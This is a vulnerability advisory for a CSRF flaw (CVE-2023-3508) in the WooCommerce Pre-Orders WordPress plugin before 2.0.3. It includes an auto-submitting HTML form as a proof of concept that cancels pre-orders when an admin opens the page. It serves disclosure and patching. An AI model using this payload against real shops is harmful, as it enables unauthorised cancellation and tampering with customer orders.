WordPress Plugin Vulnerabilities

WooCommerce Pre-Orders < 2.0.3 - Unauthorised Actions via CSRF

Description

The plugin has a flawed CSRF check when processing its tab actions, which could allow attackers to make logged in admins email pre-orders customer, change the released date, mark all pre-orders of a specific product as complete or cancel via CSRF attacks

Proof of Concept

Make a logged in admin open an HTML page with the form below (this will cancel all pre-orders for the product with ID 777)

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=wc_pre_orders&tab=actions" method="POST">
        <input type="text" name="wc_pre_orders_action" value="cancel">
        <input type="text" name="wc_pre_orders_action_product" value="777">
        <input type="submit" value="submit">
    </form>
</body>

Affects Plugins

Plugin icon
woocommerce-pre-orders
Fixed in 2.0.3

References

CVE
CVE-2023-3508

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
5.4 (medium)

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Verified
Yes
WPVDB ID
064c7acb-db57-4537-8a6d-32f7ea31c738

Timeline

Publicly Published
2023-07-10 (about 10 months ago)
Added
2023-07-10 (about 10 months ago)
Last Updated
2023-07-10 (about 10 months ago)

Other

Published
Title
Published
2022-11-03
Title
VR Calendar < 2.3.4 - Calendar Deletion/Update & Settings Update via CSRF
Published
2023-05-29
Title
WOLF < 1.0.7.1 - Profile Creation via CSRF
Published
2023-03-15
Title
Contact Form 7 Redirect & Thank You Page < 1.0.4 - Cross-Site Request Forgery
Published
2020-09-16
Title
Dokan < 3.0.9 - Cross-Site Request Forgery
Published
2023-01-19
Title
Nice PayPal Button Lite <= 1.3.5 - CSRF